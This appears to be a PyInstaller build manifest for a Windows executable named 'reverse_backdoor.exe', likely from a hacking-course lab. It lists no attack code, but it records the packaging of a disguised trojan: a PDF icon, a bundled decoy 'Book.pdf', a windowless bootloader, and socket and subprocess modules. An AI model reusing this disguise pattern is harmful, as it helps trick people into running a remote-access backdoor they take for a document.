('Z:\\compile\\dist\\reverse_backdoor.exe',
 False,
 False,
 False,
 'Z:\\compile\\pdf.ico',
 None,
 False,
 False,
 '<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity type="win32" name="reverse_backdoor" processorArchitecture="amd64" version="1.0.0.0"/><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/></dependentAssembly></dependency><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/></application></compatibility><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware></windowsSettings></application></assembly>',
 True,
 True,
 False,
 None,
 None,
 None,
 'Z:\\compile\\build\\reverse_backdoor\\reverse_backdoor.pkg',
 [('PYZ-00.pyz', 'Z:\\compile\\build\\reverse_backdoor\\PYZ-00.pyz', 'PYZ'),
  ('struct', 'C:\\Program Files\\Python38\\lib\\struct.pyo', 'PYMODULE'),
  ('pyimod01_os_path',
   'C:\\Program '
   'Files\\Python38\\lib\\site-packages\\PyInstaller\\loader\\pyimod01_os_path.pyc',
   'PYMODULE'),
  ('pyimod02_archive',
   'C:\\Program '
   'Files\\Python38\\lib\\site-packages\\PyInstaller\\loader\\pyimod02_archive.pyc',
   'PYMODULE'),
  ('pyimod03_importers',
   'C:\\Program '
   'Files\\Python38\\lib\\site-packages\\PyInstaller\\loader\\pyimod03_importers.pyc',
   'PYMODULE'),
  ('pyimod04_ctypes',
   'C:\\Program '
   'Files\\Python38\\lib\\site-packages\\PyInstaller\\loader\\pyimod04_ctypes.pyc',
   'PYMODULE'),
  ('pyiboot01_bootstrap',
   'C:\\Program '
   'Files\\Python38\\lib\\site-packages\\PyInstaller\\loader\\pyiboot01_bootstrap.py',
   'PYSOURCE'),
  ('pyi_rth_subprocess',
   'C:\\Program '
   'Files\\Python38\\Lib\\site-packages\\PyInstaller\\hooks\\rthooks\\pyi_rth_subprocess.py',
   'PYSOURCE'),
  ('reverse_backdoor',
   '\\\\VBoxSvr\\Chenge_folder\\compile\\reverse_backdoor.py',
   'PYSOURCE'),
  ('python38.dll', 'C:\\Program Files\\Python38\\python38.dll', 'BINARY'),
  ('VCRUNTIME140.dll',
   'C:\\Program Files\\Python38\\VCRUNTIME140.dll',
   'BINARY'),
  ('_bz2', 'C:\\Program Files\\Python38\\DLLs\\_bz2.pyd', 'EXTENSION'),
  ('unicodedata',
   'C:\\Program Files\\Python38\\DLLs\\unicodedata.pyd',
   'EXTENSION'),
  ('_hashlib', 'C:\\Program Files\\Python38\\DLLs\\_hashlib.pyd', 'EXTENSION'),
  ('_lzma', 'C:\\Program Files\\Python38\\DLLs\\_lzma.pyd', 'EXTENSION'),
  ('select', 'C:\\Program Files\\Python38\\DLLs\\select.pyd', 'EXTENSION'),
  ('_socket', 'C:\\Program Files\\Python38\\DLLs\\_socket.pyd', 'EXTENSION'),
  ('libcrypto-1_1.dll',
   'C:\\Program Files\\Python38\\DLLs\\libcrypto-1_1.dll',
   'BINARY'),
  ('base_library.zip',
   'Z:\\compile\\build\\reverse_backdoor\\base_library.zip',
   'DATA'),
  ('Book.pdf', 'Z:\\compile\\Book.pdf', 'DATA')],
 [],
 False,
 False,
 1654939376,
 [('runw.exe',
   'C:\\Program '
   'Files\\Python38\\lib\\site-packages\\PyInstaller\\bootloader\\Windows-64bit\\runw.exe',
   'EXECUTABLE')])
